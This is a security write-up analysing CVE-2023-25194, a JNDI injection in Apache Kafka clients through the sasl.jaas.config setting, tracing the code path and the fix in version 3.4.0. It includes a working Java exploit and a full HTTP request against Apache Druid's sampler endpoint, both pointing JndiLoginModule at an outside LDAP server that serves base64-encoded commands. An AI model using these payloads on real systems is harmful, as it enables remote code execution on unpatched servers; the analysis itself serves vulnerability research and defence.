CVE-2023-25194 Kafka JNDI injection analysis

Apache Kafka Clients Jndi Injection

Vulnerability description

Apache Kafka is a distributed data stream processing platform that can publish, subscribe, store and process data streams in real time. Kafka Connect is a tool for scalable, reliable streaming of data between Kafka and other systems. An attacker can use any Kafka client based on SASL JAAS configuration and SASL protocol to achieve remote code execution by constructing special configurations and performing JNDI injection when creating or modifying connectors for Kafka Connect workers.

Scope of influence

2.4.0 <= Apache Kafka <= 3.3.2

Prerequisite knowledge

What is Kafka

Kafka is an open source distributed messaging system. Kafka can handle a large number of messages and data streams and has the characteristics of high throughput, low latency, and scalability. It is widely used in big data fields, such as log collection, data transmission, stream processing and other scenarios.

It feels very similar to RocketMQ, and its main functions are used for data transmission.

Kafka client SASL JAAS configuration

Simple Authentication and Security Layer (SASL) is a framework used for authentication and data encryption in network protocols. It is represented as JAAS in the actual application of Kafka.

Java Authentication and Authorization Service (JAAS) is a Java user-centric security framework that complements Java’s code-centric security. To sum up, it is used for authentication. Interestingly, Shiro (JSecurity) was originally developed because of the many shortcomings of JAAS at that time.

Referenced from https://blog.csdn.net/yinxuep/article/details/103242969 There are also some subtle configurations that will not be expanded upon here. The actual effect of dynamic setting and static modification of .conf file is the same.

Server configuration

1. The server JASS file is usually configured under the server node. For example, here we name it kafka_server_jaas.conf, and the content is as follows

KafkaServer {
    org.apache.kafka.common.security.plain.PlainLoginModule required
    username="eystar"
    password="eystar8888"
    user_eystar="eystar8888"
    user_yxp="yxp-secret";
};

Description:

username + password represents the authentication information used for communication between brokers in the kafka cluster environment.

user_eystar="eystar8888" means defining the user information for the client to connect to the proxy, that is, creating a user identity information with the user name eystar and password eystar8888. The kafka proxy authenticates it and can create multiple User, format user_XXX=”XXX”

2. If it is used statically, it needs to be added to the JVM startup parameters, as follows

if [ "x$KAFKA_OPTS" ]; then

    export KAFKA_OPTS="-Djava.security.auth.login.config=/opt/modules/kafka_2.11-2.0.0/config/kafka_server_jaas.conf"

fi

https://kafka.apache.org/documentation/#brokerconfigs_sasl.jaas.config

Client configuration

Basically the same as the server, the following steps

1. Configure the client JAAS file and name it kafka_client_jaas.conf

KafkaClient {
        org.apache.kafka.common.security.plain.PlainLoginModule required
        username="eystar"
        password="eystar8888";
};

2. Specify the configuration properties sasl.jaas.config when connecting to the Kafka Client called by JAVA.

sasl.jaas.config=org.apache.kafka.common.security.plain.PlainLoginModule required \
    username="eystar" \
password="eystar8888";
// That is, configuration properties: (I will talk about it later and it can also be configured dynamically, which reminds me of RocketMQ)
Pro.set("sasl.jaas.config","org.apache.kafka.common.security.plain.PlainLoginModule required username="eystar" password="eystar8888";";
”);
Kafka client dynamically modifies JAAS configuration

Method 1: Configure the Properties attribute. You can notice that the key name of this field is sasl.jaas.config, and its format is as follows

loginModuleClass controlFlag (optionName=optionValue)*;

The loginModuleClass represents the authentication method, such as LDAP, Kerberos, and Unix authentication. You can refer to the official document https://docs.oracle.com/javase/8/docs/technotes/guides/security/jgss/tutorials/LoginConfigFile.html. There is one The location is JndiLoginModule, and the JDK’s own loginModule is located at com.sun.security.auth.module

Picture

//Safe mode username password
props.setProperty("sasl.jaas.config", "org.apache.kafka.common.security.plain.PlainLoginModule required username="usn" password="pwd";");
props.setProperty("security.protocol", "SASL_PLAINTEXT");
props.setProperty("sasl.mechanism", "PLAIN");

Method 2: Set system property parameters

//Specify kafka_client_jaas.conf file path
String confPath = TestKafkaComsumer.class.getResource("/").getPath() + "/kafka_client_jaas.conf";
System.setProperty("java.security.auth.login.config", confPath);
Implementation code

Consumer

public class TestComsumer {

   public static void main(String[] args) {

        Properties props = new Properties();
        props.put("bootstrap.servers", "192.168.1.176:9092");
        props.put("group.id", "test_group");
        props.put("enable.auto.commit", "true");
        props.put("auto.commit.interval.ms", "1000");
        props.put("key.deserializer",
                "org.apache.kafka.common.serialization.StringDeserializer");
        props.put("value.deserializer",
                "org.apache.kafka.common.serialization.StringDeserializer");
        // Configuration of sasl.jaas.config
        props.setProperty("sasl.jaas.config", "org.apache.kafka.common.security.plain.PlainLoginModule required username="usn" password="pwd";");
        props.setProperty("security.protocol", "SASL_PLAINTEXT");
        props.setProperty("sasl.mechanism", "PLAIN");

        KafkaConsumer<String, String> consumer = new KafkaConsumer<>(props);
        consumer.subscribe(Arrays.asList("topic_name"));
        while (true) {
           try {
                ConsumerRecords<String, String> records = consumer.poll(Duration
                        .ofMillis(100));
                for (ConsumerRecord<String, String> record : records)
                    System.out.printf("offset = %d, partition = %d, key = %s, value = %s%n",
                            record.offset(), record.partition(), record.key(), record.value());
          
            } catch (Exception e) {
                e.printStackTrace();
            }
        }

    
    }

}

Producer

public class TestProduce {

    public static void main(String args[]) {

        Properties props = new Properties();

        props.put("bootstrap.servers", "192.168.1.176:9092");
        props.put("acks", "1");
        props.put("retries", 3);
        props.put("batch.size", 16384);
        props.put("buffer.memory", 33554432);
        props.put("linger.ms", 10);
        props.put("key.serializer",
                "org.apache.kafka.common.serialization.StringSerializer");
        props.put("value.serializer",
                "org.apache.kafka.common.serialization.StringSerializer");

        //sasl
        props.setProperty("sasl.jaas.config", "org.apache.kafka.common.security.plain.PlainLoginModule required username="usn" password="pwd";");
        props.setProperty("security.protocol", "SASL_PLAINTEXT");
        props.setProperty("sasl.mechanism", "PLAIN");

        Producer<String, String> producer = new KafkaProducer<>(props);
        
       /**
        * ProducerRecord parameter analysis The first one: topic_name is the producer topic name,
        * Second: For producer kafka2.0, you need to specify a key
        *, in enterprise applications, we generally use it as businessId, such as order ID, user ID, etc. Third: the main information of the message
        */

        try {
              producer.send(new ProducerRecord<String, String>("topic_name", Integer.toString(i), "message info"));

        } catch (InterruptedException e) {
               e.printStackTrace();
        }

   }

}

Vulnerability Recurrence

The trigger point of the vulnerability is actually at the com.sun.security.auth.module.JndiLoginModule#attemptAuthentication method

Picture

lookup.png

It is easy to construct EXP by straightening out the logic

import org.apache.kafka.clients.consumer.KafkaConsumer;
import org.apache.kafka.clients.producer.KafkaProducer;

import java.util.Properties;

public class EXP {
    public static void main(String[] args) throws Exception {
        Properties properties = new Properties();
        properties.put("bootstrap.servers", "127.0.0.1:1234");
        properties.put("key.deserializer", "org.apache.kafka.common.serialization.StringDeserializer");
        properties.put("value.deserializer","org.apache.kafka.common.serialization.StringDeserializer");

        properties.put("sasl.mechanism", "PLAIN");
        properties.put("security.protocol", "SASL_SSL");
        properties.put("sasl.jaas.config", "com.sun.security.auth.module.JndiLoginModule " +
                "required " +
                "user.provider.url="ldap://124.222.21.138:1389/Basic/Command/Base64/Q2FsYw==" " +
                "useFirstPass="true" " +
                "group.provider.url="xxx";");

        KafkaConsumer<String, String> kafkaConsumer = new KafkaConsumer<>(properties);
        kafkaConsumer.close();
    }
}

Picture

Vulnerability Analysis

There is a lot of data processing and assignment in the front, so I will skip it here and look directly at line 177 of the org.apache.kafka.clients.consumer.KafkaConsumer class ClientUtils.createChannelBuilder(), follow up.

Picture

Continue to follow up. Here we will first determine whether the SASL mode is turned on. Only if it is turned on will we continue to the create() method.

Picture

SASL_SSL.png

Follow up the create() method. After completing the judgment on the client and the security protocol, the loadClientContext() method is called. Follow up and find that some configurations are still loaded. .

Picture

Jump out and follow the ((ChannelBuilder)channelBuilder).configure(configs) method, and finally follow the structure of org.apache.kafka.common.security.authenticator.LoginManager function.

Picture

LoginManager.png

Follow up the login() method, here new LoginContext(), then call the login() method, follow up

Picture

The initialize() method of JndiLoginModule will be called here.

Picture

After the initialization is completed, the login() method of JndiLoginModule is called here, and finally the attemptAuthentication() method of JndiLoginModule is called. , complete Jndi injection.

Picture

Bug fix

In version 3.4.0, the official fix is to add a blacklist to JndiLoginModule

org.apache.kafka.common.security.JaasContext#throwIfLoginModuleIsNotAllowed

private static void throwIfLoginModuleIsNotAllowed(AppConfigurationEntry appConfigurationEntry) {
    Set<String> disallowedLoginModuleList = (Set)Arrays.stream(System.getProperty("org.apache.kafka.disallowed.login.modules", "com.sun.security.auth.module.JndiLoginModule").split(", ")).map(String::trim).collect(Collectors.toSet());
    String loginModuleName = appConfigurationEntry.getLoginModuleName().trim();
    if (disallowedLoginModuleList.contains(loginModuleName)) {
        throw new IllegalArgumentException(loginModuleName + " is not allowed. Update System property '" + "org.apache.kafka.disallowed.login.modules" + "' to allow " + loginModuleName);
    }
}

Apache Druid RCE via Kafka Clients

Affected versions: Apache Druid <= 25.0.0

Apache Druid is a real-time analytical database that supports importing data (Consumer) from Kafka, because the current version of the kafka-clients dependency used by the latest version of Apache Druid 25.0.0 is still 3.3.1. That is, the vulnerable version, so if there is unauthorized access to the target Druid (default configuration has no authentication), RCE can be implemented in this way

Interestingly, Druid includes the commons-beanutils:1.9.4 dependency, so even with a higher version of the JDK, you can deserialize the payload through LDAP JNDI to implement RCE.

  • ? Trigger point at the vulnerability UI: Druid Web Console – Load data – Apache Kafka

Here you can load Kafka’s Data, where you can modify the configuration item sasl.jaas.config to construct the Payload

POST http://124.222.21.138:8888/druid/indexer/v1/sampler?for=connect HTTP/1.1
Host: 124.222.21.138:8888
Content-Length: 916
Accept: application/json, text/plain, */*
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.43
Content-Type: application/json
Origin: http://124.222.21.138:8888
Referer: http://124.222.21.138:8888/unified-console.html
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8,en-GB;q=0.7,en-US;q=0.6,ja;q=0.5,zh-TW;q=0.4, no;q=0.3,ko;q=0.2
Connection: close

{"type":"kafka","spec":{"type":"kafka","ioConfig":{"type":"kafka","consumerProperties":{"bootstrap.servers":"127.0.0.1 :1234",
"sasl.mechanism":"SCRAM-SHA-256",
                "security.protocol":"SASL_SSL",
                "sasl.jaas.config":"com.sun.security.auth.module.JndiLoginModule required user.provider.url="ldap://124.222.21.138:1389/Basic/Command/base64/aWQgPiAvdG1wL3N1Y2Nlc3M=" useFirstPass ="true" serviceName="x" debug="true" group.provider.url="xxx";"
},"topic":"123","useEarliestOffset":true,"inputFormat":{"type":"regex","pattern":"([\s\S]*)","listDelimiter" :"56616469-6de2-9da4-efb8-8f416e6e6965","columns":["raw"]}},"dataSchema":{"dataSource":"sample","timestampSpec":{"column":"!! !_no_such_column_!!!","missingValue":"1970-01-01T00:00:00Z"},"dimensionsSpec":{},"granularitySpec":{"rollup":false}},"tuningConfig":{" type":"kafka"}},"samplerConfig":{"numRows":500,"timeoutMs":15000}}

Picture

Picture

You can see the process of instantiating KafkaConsumer in the extension druid-kafka-indexing-service

Picture

The addConsumerPropertiesFromConfig() on line 286 above dynamically changes the configuration.

Apache Druid 26.0.0 updates the version of kafka dependency

https://github.com/apache/druid/blob/26.0.0/pom.xml#L79